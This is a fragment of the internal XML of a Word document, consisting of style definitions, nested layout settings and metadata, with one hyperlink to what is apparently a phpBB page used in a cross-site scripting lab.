    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D4736"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D47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296728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1475029298">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2065638965">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="35422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468425">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1051347580">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="286204004">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="154189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782227">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1951624491">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="205870673">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="138394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613395">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2082409898">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="959262793">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1188718601">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="118674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hyperlink" Target="http://www.xsslabphpbb.com/posting.php" TargetMode="External"/><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16</Pages>
  <Words>1357</Words>
  <Characters>7738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Nandar SOE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nandar SOE</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-21T16:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-21T18:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>